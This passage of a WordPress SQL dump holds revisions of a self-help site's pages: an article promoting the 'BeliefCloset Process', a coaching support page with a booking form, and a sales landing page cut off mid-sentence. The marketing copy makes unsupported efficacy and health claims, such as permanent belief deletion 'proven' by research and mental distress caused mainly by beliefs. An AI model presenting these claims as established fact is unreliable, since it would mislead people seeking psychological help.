(2144, 2, '2015-03-17 02:04:18', '2015-03-17 07:04:18', '<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/boat-on-spectacular-sunset.jpg"><img class="alignleft  wp-image-956" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/boat-on-spectacular-sunset-250x300.jpg" alt="boat on spectacular sunset" width="143" height="172" /></a>After studying more than twenty different belief-change methodologies, I identified seven crucial elements required for permanent belief change.  I tested these methodologies personally, and also with clients.  If all seven elements are present, a belief can be completely eliminated from the core of the psyche.  If any of the elements are missing, results will be incomplete, temporary, or ineffective.\r\n\r\nMost of the techniques I studied turned out to be only partially effective, because they were missing one or more of the seven required elements.\r\n\r\nWhen the belief-change process is partial, or incomplete, clients offer comments such as:\r\n<ul>\r\n<ul>\r\n	<li><em>“I felt a little better.”</em></li>\r\n	<li><em>“I got something out of the process, but it didn’t rock my world.”</em></li>\r\n	<li><em>“The process seemed to work for a while, then it faded.”</em></li>\r\n	<li><em>“The belief was gone right after the process ended, but it returned two days later.”</em></li>\r\n	<li><em>“The world looked different that day, and I felt great.  The next day I was right back where I had been before.”</em></li>\r\n</ul>\r\n</ul>\r\nI began seeking a more permanent solution – a way to completely eliminate negative and limiting beliefs – so the old beliefs wouldn’t return like a rash that never quite disappears... <!--more-->With most of these methods, the belief continued to operate in the background, and the individual''s responses, reactions and behavior were mostly the same as they had been before.  Even if the belief disappeared from awareness, it seemed to creep back into consciousness in a few hours, days, or weeks.\r\n\r\nI tested these techniques, along with many others:\r\n<ul>\r\n<ul>\r\n	<li>Affirmations</li>\r\n	<li>EFT (Tapping)</li>\r\n	<li>Neuro-Linguistic Programming (NLP)</li>\r\n	<li>Access Consciousness</li>\r\n	<li>“The Work” of Byron Katie</li>\r\n	<li>The Lefkoe Method</li>\r\n	<li>The Avatar Materials</li>\r\n</ul>\r\n</ul>\r\nI analyzed the psychological, mental, and emotional components of each method. I sought to understand each of their advantages and disadvantages.  This is what I discovered:\r\n<ol>\r\n<ol>\r\n	<li>Most techniques work at the <em>conscious level of the mind. </em>It is helpful to recognize that you have a belief, and recognize that the belief isn’t actually true.  This is a good and necessary first step.  However, as important as these two conscious steps are, they don’t touch – or clear – the belief from the subconscious mind, which is where it appears to be stored.</li>\r\n	<li>"Core beliefs,” the ones that affect us most deeply, are literally below the level of consciousness, and are not easily accessible by the conscious mind. Many were acquired before we gained the ability to speak, so they are stored non-verbally, and cannot be accessed through language-based instructions.</li>\r\n	<li>Many practices claim that their technique shifts beliefs in the subconscious mind, but the results are fuzzy, inconsistent, or temporary.  Often, results depend on the practitioner, which hints at the possibility that the practitioner has more influence than the technique does. This suggests that the technique isn’t actually clearing the belief completely or permanently. These methods will only be partially effective and temporary.</li>\r\n	<li>Some methods involve muscle testing as a way of determining whether the client has a particular belief, or whether the belief has been cleared.  Muscle testing is highly problematic. It is unreliable, unscientific, and it the skill of the practitioner is paramount.  Most people don''t have sufficient training to keep their own projections out of the process.   Muscle testing works for some people, but many others don’t believe in it, or think it’s too woo-woo. This makes the technique ineffective for many people.</li>\r\n	<li>Many methods require the practitioner to do something mysterious to you, or for you. Often, these processes have pseudo-scientific names such as "Quantum Field Cleansing" or "Matrix Manifestation Clearing."  When the practitioner is in charge of your belief clearing, it creates a dependency on the practitioner for future clearings. This is good business, but bad science. Since our beliefs create our reality, any system or process the client <em>believes in</em> will have some positive results – for a while. Most people don’t experience permanent change, however.  (And clients often blame themselves if the process doesn’t work, rather than challenging the methodology’s effectiveness.)</li>\r\n	<li>Some belief-change techniques take the client through long lists of beliefs to test  whether they have them.  We are easily programmed by others, so this method can actually introduce new beliefs into the client’s system, rather than clearing out the ones they have.</li>\r\n	<li>Methods that use “tapping” such as EFT claim to clear issues permanently.  Tapping meridian points on the body certainly seems to shift one''s energy in the moment, and this can be very helpful. However, I haven’t seen evidence that the changes caused by tapping are permanent, or result in significant behavior change.  (Although it has been used effectively for clearing past trauma conditions such as PTSD).</li>\r\n</ol>\r\n</ol>\r\nAfter my study of these various methodologies, I concluded that a new methodology was needed – one based on a scientific understanding of the belief formation process – including neurology, psychology, and physiology, as well as a deep understanding of the structure of consciousness and the mind itself.\r\n\r\nI needed to see specific evidence that a belief was permanently removed.  This included: 1) significant and permanent shifts in both awareness and behavior; 2) no back-sliding or repeating of the old patterns; 3) a significant, felt change in the clients’ view of themselves, other people, and the world; and 4) behavioral changes that unfolded naturally and automatically toward actions that would create their desired outcomes.   A successful outcome would produce a change in self-view, others-view, and world view.   The client would feel more confident and empowered.  They would treat themselves and others with more love and respect.  And the individual’s circumstances would change, and new opportunities would appear that hadn’t appeared before.\r\n\r\nI created the <em>BeliefCloset Process </em>to achieve all of these goals, and ten years of research and development have proven my proposition.  It uses guided imagery to engage all levels of the mind.  Thousands of people have gone through the process, and I have taught the methodology to hundreds of therapists, coaches, and healers around the world who now use it in their practice.\r\n\r\n<em>The BeliefCloset Process</em> is not a silver bullet that changes everything magically. It is a tool that can be used to do the inner work required.  It has a profound impact that can be felt viscerally when each belief is dis-created.\r\n\r\nThese are the seven elements necessary to delete a belief permanently from the core of the psyche.  The BeliefCloset Process utilizes all of them:\r\n<ol>\r\n<ol>\r\n	<li>The client recognizes that a belief is involved in the condition, problem, or issue they want to change, and they acknowledge that the belief is just a belief – it is not actually true.</li>\r\n	<li>The client comes to know the belief intimately – as a part of themselves.  They can feel the belief’s impact on their life and on their future possibilities.  They can also feel the  bo</li>\r\n	<li>The client follows the belief down to its root – to its beginnings, in the subconscious mind.  The source could have been indoctrination by others, a self-created conclusion, or a karmic carry-over from the past.</li>\r\n	<li>The client experiences separation from the belief, and recognizes their role in creating it.  This brings the client into their superconscious, or Higher Self, and gives them the power to un-create it.</li>\r\n	<li>The client makes a conscious decision to let the belief go and eliminate it from existence.</li>\r\n	<li>The subconscious, conscious, and super-conscious mind are involved collaboratively in destroying the belief.  Thus, there is no built-in resistance to the act. This is akin to pulling a weed up by its roots so it doesn’t grow back.</li>\r\n	<li>Once the belief is destroyed, the client chooses a new, empowering belief to plant in the space formerly held by the old belief.  This positive belief aligns the client with their highest intentions and their Higher Self.  By destroying the old belief first, this new affirmative belief, or declaration, can then create its intended reality without resistance from old beliefs in the subconscious mind.</li>\r\n</ol>\r\n</ol>\r\nGuided imagery provides a rich tapestry to engage the subconscious mind. Instructions and requests for feedback engages the conscious mind, and the choice to delete the belief involves the super-conscious mind, or Higher Self.\r\n\r\nIt is crucial that the client make all of their own decisions throughout the process.  This creates safety, and puts the client in charge of the process. This prevents them from becoming subject to the Guide''s recommendations or good ideas (which would just be further indoctrination).  By using a rich metaphor and a playful approach to engage the subconscious mind, the technique had proven itself not only effective, but also creative and fun!\r\n\r\nClear Your Beliefs, a 7-week recorded program, allows individuals to conveniently conduct a major clean-out of their core belief system.  It gently guide users through the seven steps, and allows them to delete their own negative and limiting beliefs – the ones that have interfered with their attainment of success, wealth, health, and loving relationships.  This gives the client control over their own belief structures. It is a true empowerment system.\r\n\r\n<em>The BeliefCloset Process</em> is offered as a power tool for therapists, healers, and coaches worldwide.  Information for practitioners is available on <a href="http://www.ClearBeliefs.com">www.ClearBeliefs.com</a>.\r\n\r\n&nbsp;', '7 Steps to Clear Any Belief', '', 'inherit', 'open', 'open', '', '2136-revision-v1', '', '', '2015-03-17 02:04:18', '2015-03-17 07:04:18', '', 2136, 'http://clearyourbeliefs.com/2136-revision-v1/', 0, 'revision', '', 0),
(2146, 2, '2015-03-17 02:15:39', '2015-03-17 07:15:39', '<h1><strong>CLEAR YOUR BELIEFS – SUPPORT</strong></h1>\r\n&nbsp;\r\n\r\nWe are happy to provide you with support while you''re going through the Clear Your Beliefs program.\r\n\r\nWe offer one free 15-minute consultation, which you can use to get help with any issue or question, whether technical or personal.\r\n\r\nSchedule your time below. At the time of your appointment, one of our Clear Your Beliefs Coaches will contact you by phone or skype. Be sure to provide your Skype address if you are outside the U.S.\r\n\r\nBe available at the time you scheduled. If you do not answer the call at that time, you will forfeit your appointment.\r\n\r\nYour coach will let you know when you''ve used the free 15 minutes. You will then be offered the option of continuing your coaching session for a full hour (another 45 minutes) for only $100, which is one-half the standard CYB Coaching rate. If you choose to continue the call, you can pay the fee via Paypal. Your Coach will give you instructions.\r\n\r\nSchedule your Free 15-minute Consultation by choosing a date and time below. Then press the “Continue” button.\r\n\r\nIf you prefer we respond to your questions by email, fill out the contact form below as fully as possible. We will do our best to respond within a few days. (Scheduled phone appointments receive our priority attention.)\r\n\r\n<strong>We look forward to serving you!</strong>\r\n\r\n<iframe src="https://www.timetrade.com/book/DDTDP" width="760" height="683" frameborder="0"></iframe>\r\n<p style="text-align: justify; font-size: 18px; margin-top: 15px;">If you prefer we contact you by email, please fill out this form as fully as possible. We will do our best to respond within a few days (scheduled phone appointments (using the link above) receive our priority attention.</p>\r\n[Contact Form HERE]\r\n\r\nFirst Name *\r\n\r\nLast Name *\r\n\r\nEmail *\r\n\r\nPhone\r\n\r\nSkype name\r\n\r\nCity\r\n\r\nState\r\n\r\nCountry\r\n\r\nI prefer to be contacted\r\n\r\nby email\r\n\r\nby skype\r\n\r\nby phone\r\n\r\nPreferred time of contact\r\n\r\nmorning\r\n\r\nafternoon\r\n\r\nevening\r\n\r\nI would like support for: *', 'Support', '', 'inherit', 'open', 'open', '', '2094-revision-v1', '', '', '2015-03-17 02:15:39', '2015-03-17 07:15:39', '', 2094, 'http://clearyourbeliefs.com/2094-revision-v1/', 0, 'revision', '', 0),
(2147, 2, '2015-03-17 03:18:40', '2015-03-17 08:18:40', '<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/boat-on-spectacular-sunset.jpg"><img class="alignleft  wp-image-956" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/boat-on-spectacular-sunset-250x300.jpg" alt="boat on spectacular sunset" width="195" height="234" /></a><strong>After studying more than twenty different belief-change methodologies, I identified 7 crucial elements required for permanent belief change</strong>.\r\n\r\nI tested each methodology personally, and also with clients.  I found that if all 7 elements are present, a belief can be completely and permanently eliminated from the psyche.  If any of the 7 elements are missing, results will be incomplete, temporary, or ineffective.\r\n\r\nMost of the techniques I studied turned out to be only partially effective, because they were missing one or more of the seven required elements.\r\n\r\nWhen the belief-change process is partial, or incomplete, clients offer comments such as:\r\n<ul>\r\n<ul>\r\n<ul>\r\n	<li><em style="line-height: 1.5;">“I felt a little better.”</em></li>\r\n	<li><em>“I got something out of the process, but it didn’t rock my world.”</em></li>\r\n	<li><em>“The process seemed to work for a while, then it faded.”</em></li>\r\n	<li><em>“The belief was gone right after the process ended, but it returned two days later.”</em></li>\r\n	<li><em>“The world looked different that day, and I felt great.  The next day I was right back where I had been before.”</em></li>\r\n</ul>\r\n</ul>\r\n</ul>\r\nI began seeking a more permanent solution – a way to completely eliminate negative and limiting beliefs – so the old beliefs wouldn’t return like a rash that never quite disappears... <!--more-->With most of these methods, the belief continued to operate in the background, and the individual''s responses, reactions and behavior were mostly the same as they had been before.  Even if the belief disappeared from awareness, it seemed to creep back into consciousness in a few hours, days, or weeks.\r\n\r\n<strong>I tested these techniques, along with many others:</strong>\r\n<ul>\r\n<ul>\r\n<ul>\r\n	<li><span style="line-height: 1.5;">Affirmations</span></li>\r\n	<li>EFT (Tapping)</li>\r\n	<li>Neuro-Linguistic Programming (NLP)</li>\r\n	<li>Access Consciousness</li>\r\n	<li>“The Work” of Byron Katie</li>\r\n	<li>The Lefkoe Method</li>\r\n	<li>The Avatar Materials</li>\r\n</ul>\r\n</ul>\r\n</ul>\r\nI analyzed the psychological, mental, and emotional components of each method. I sought to understand each of their advantages and disadvantages.  <strong>This is what I discovered:</strong>\r\n<ol>\r\n<ol>\r\n<ol>\r\n	<li>Most techniques work at the <em>conscious level of the mind. </em>It is helpful to recognize that you have a belief, and recognize that the belief isn’t actually true.  This is a good and necessary first step.  However, as important as these two conscious steps are, they don’t touch – or clear – the belief from the subconscious mind, which is where it appears to be stored.</li>\r\n	<li>"Core beliefs,” the ones that affect us most deeply, are literally below the level of consciousness, and are not easily accessible by the conscious mind. Many were acquired before we gained the ability to speak, so they are stored non-verbally, and cannot be accessed through language-based instructions.</li>\r\n	<li>Many practices claim that their technique shifts beliefs in the subconscious mind, but the results are fuzzy, inconsistent, or temporary.  Often, results depend on the practitioner, which hints at the possibility that the practitioner has more influence than the technique does. This suggests that the technique isn’t actually clearing the belief completely or permanently. These methods will only be partially effective and temporary.</li>\r\n	<li>Some methods involve muscle testing as a way of determining whether the client has a particular belief, or whether the belief has been cleared.  Muscle testing is highly problematic. It is unreliable, unscientific, and it the skill of the practitioner is paramount.  Most people don''t have sufficient training to keep their own projections out of the process.   Muscle testing works for some people, but many others don’t believe in it, or think it’s too woo-woo. This makes the technique ineffective for many people.</li>\r\n	<li>Many methods require the practitioner to do something mysterious to you, or for you. Often, these processes have pseudo-scientific names such as "Quantum Field Cleansing" or "Matrix Manifestation Clearing."  When the practitioner is in charge of your belief clearing, it creates a dependency on the practitioner for future clearings. This is good business, but bad science. Since our beliefs create our reality, any system or process the client <em>believes in</em> will have some positive results – for a while. Most people don’t experience permanent change, however.  (And clients often blame themselves if the process doesn’t work, rather than challenging the methodology’s effectiveness.)</li>\r\n	<li>Some belief-change techniques take the client through long lists of beliefs to test  whether they have them.  We are easily programmed by others, so this method can actually introduce new beliefs into the client’s system, rather than clearing out the ones they have.</li>\r\n	<li>Methods that use “tapping” such as EFT claim to clear issues permanently.  Tapping meridian points on the body certainly seems to shift one''s energy in the moment, and this can be very helpful. However, I haven’t seen evidence that the changes caused by tapping are permanent, or result in significant behavior change.  (Although it has been used effectively for clearing past trauma conditions such as PTSD).</li>\r\n</ol>\r\n</ol>\r\n</ol>\r\n<strong>After my study of these various methodologies, I concluded that a new methodology was needed – one based on a scientific understanding of the belief formation process – including neurology, psychology, and physiology, as well as a deep understanding of the structure of consciousness and the mind itself.</strong>\r\n\r\nI needed to see specific evidence that a belief was permanently removed.  This included: 1) significant and permanent shifts in both awareness and behavior; 2) no back-sliding or repeating of the old patterns; 3) a significant, felt change in the clients’ view of themselves, other people, and the world; and 4) behavioral changes that unfolded naturally and automatically toward actions that would create their desired outcomes.   A successful outcome would produce a change in self-view, others-view, and world view.   The client would feel more confident and empowered.  They would treat themselves and others with more love and respect.  And the individual’s circumstances would change, and new opportunities would appear that hadn’t appeared before.\r\n\r\n<strong>I created the <em>BeliefCloset Process </em>to achieve all of these goals, and ten years of research and development have proven my proposition.</strong>  It uses guided imagery to engage all levels of the mind.  Thousands of people have gone through the process, and I have taught the methodology to hundreds of therapists, coaches, and healers around the world who now use it in their practice.\r\n\r\n<em>The BeliefCloset Process</em> is not a silver bullet that changes everything magically. It is a tool that can be used to do the inner work required.  It has a profound impact that can be felt viscerally when each belief is dis-created.\r\n\r\n<strong>These are the seven elements necessary to delete a belief permanently from the core of the psyche.  The BeliefCloset Process utilizes all of them:</strong>\r\n<ol>\r\n<ol>\r\n<ol>\r\n	<li>The client recognizes that a belief is involved in the condition, problem, or issue they want to change, and they acknowledge that the belief is just a belief – it is not actually true.</li>\r\n	<li>The client comes to know the belief intimately – as a part of themselves.  They can feel the belief’s impact on their life and on their future possibilities.  They can also feel the  bo</li>\r\n	<li>The client follows the belief down to its root – to its beginnings, in the subconscious mind.  The source could have been indoctrination by others, a self-created conclusion, or a karmic carry-over from the past.</li>\r\n	<li>The client experiences separation from the belief, and recognizes their role in creating it.  This brings the client into their superconscious, or Higher Self, and gives them the power to un-create it.</li>\r\n	<li>The client makes a conscious decision to let the belief go and eliminate it from existence.</li>\r\n	<li>The subconscious, conscious, and super-conscious mind are involved collaboratively in destroying the belief.  Thus, there is no built-in resistance to the act. This is akin to pulling a weed up by its roots so it doesn’t grow back.</li>\r\n	<li>Once the belief is destroyed, the client chooses a new, empowering belief to plant in the space formerly held by the old belief.  This positive belief aligns the client with their highest intentions and their Higher Self.  By destroying the old belief first, this new affirmative belief, or declaration, can then create its intended reality without resistance from old beliefs in the subconscious mind.</li>\r\n</ol>\r\n</ol>\r\n</ol>\r\nGuided imagery provides a rich tapestry to engage the subconscious mind. Instructions and requests for feedback engages the conscious mind, and the choice to delete the belief involves the super-conscious mind, or Higher Self.\r\n\r\nIt is crucial that the client make all of their own decisions throughout the process.  This creates safety, and puts the client in charge of the process. This prevents them from becoming subject to the Guide''s recommendations or good ideas (which would just be further indoctrination).  By using a rich metaphor and a playful approach to engage the subconscious mind, the technique had proven itself not only effective, but also creative and fun!\r\n\r\n<strong>Clear Your Beliefs, a 7-week recorded program, allows individuals to conveniently conduct a major clean-out of their core belief system. </strong> It gently guide users through the seven steps, and allows them to delete their own negative and limiting beliefs – the ones that have interfered with their attainment of success, wealth, health, and loving relationships.  This gives the client control over their own belief structures. It is a true empowerment system.\r\n\r\n<strong><em>The BeliefCloset Process</em> is offered as a power tool for therapists, healers, and coaches worldwide.</strong>  Information for practitioners is available on <a href="http://www.ClearBeliefs.com">www.ClearBeliefs.com</a>.\r\n\r\n&nbsp;', '7 Steps to Clear Any Belief', '', 'inherit', 'open', 'open', '', '2136-revision-v1', '', '', '2015-03-17 03:18:40', '2015-03-17 08:18:40', '', 2136, 'http://clearyourbeliefs.com/2136-revision-v1/', 0, 'revision', '', 0),
(2148, 2, '2015-03-17 13:03:24', '2015-03-17 18:03:24', '<h1>CLEAR YOUR BELIEFS – SUPPORT</h1>\r\n&nbsp;\r\n\r\nWe are happy to provide you with support while you''re going through the Clear Your Beliefs program.\r\n\r\nWe offer one free 15-minute consultation, which you can use to get help with any issue or question, whether technical or personal.\r\n\r\nSchedule your time below. At the time of your appointment, one of our Clear Your Beliefs Coaches will contact you by phone or skype. Be sure to provide your Skype address if you are outside the U.S.\r\n\r\nBe available at the time you scheduled. If you do not answer the call at that time, you will forfeit your appointment.\r\n\r\nYour coach will let you know when you''ve used the free 15 minutes. You will then be offered the option of continuing your coaching session for a full hour (another 45 minutes) for only $100, which is one-half the standard CYB Coaching rate. If you choose to continue the call, you can pay the fee via Paypal. Your Coach will give you instructions.\r\n\r\nSchedule your Free 15-minute Consultation by choosing a date and time below. Then press the “Continue” button.\r\n\r\nIf you prefer we respond to your questions by email, fill out the contact form below as fully as possible. We will do our best to respond within a few days. (Scheduled phone appointments receive our priority attention.)\r\n\r\n<strong>We look forward to serving you!</strong>\r\n\r\n<iframe src="https://www.timetrade.com/book/DDTDP" width="760" height="683" frameborder="0"></iframe>\r\n<p style="text-align: justify; font-size: 18px; margin-top: 15px;">If you prefer we contact you by email, please fill out this form as fully as possible. We will do our best to respond within a few days (scheduled phone appointments (using the link above) receive our priority attention.</p>\r\n[Contact Form HERE]\r\n\r\nFirst Name *\r\n\r\nLast Name *\r\n\r\nEmail *\r\n\r\nPhone\r\n\r\nSkype name\r\n\r\nCity\r\n\r\nState\r\n\r\nCountry\r\n\r\nI prefer to be contacted\r\n\r\nby email\r\n\r\nby skype\r\n\r\nby phone\r\n\r\nPreferred time of contact\r\n\r\nmorning\r\n\r\nafternoon\r\n\r\nevening\r\n\r\nI would like support for: *', 'Support', '', 'inherit', 'open', 'open', '', '2094-revision-v1', '', '', '2015-03-17 13:03:24', '2015-03-17 18:03:24', '', 2094, 'http://clearyourbeliefs.com/2094-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2149, 2, '2015-03-17 21:06:22', '2015-03-18 02:06:22', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p>&nbsp;</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like 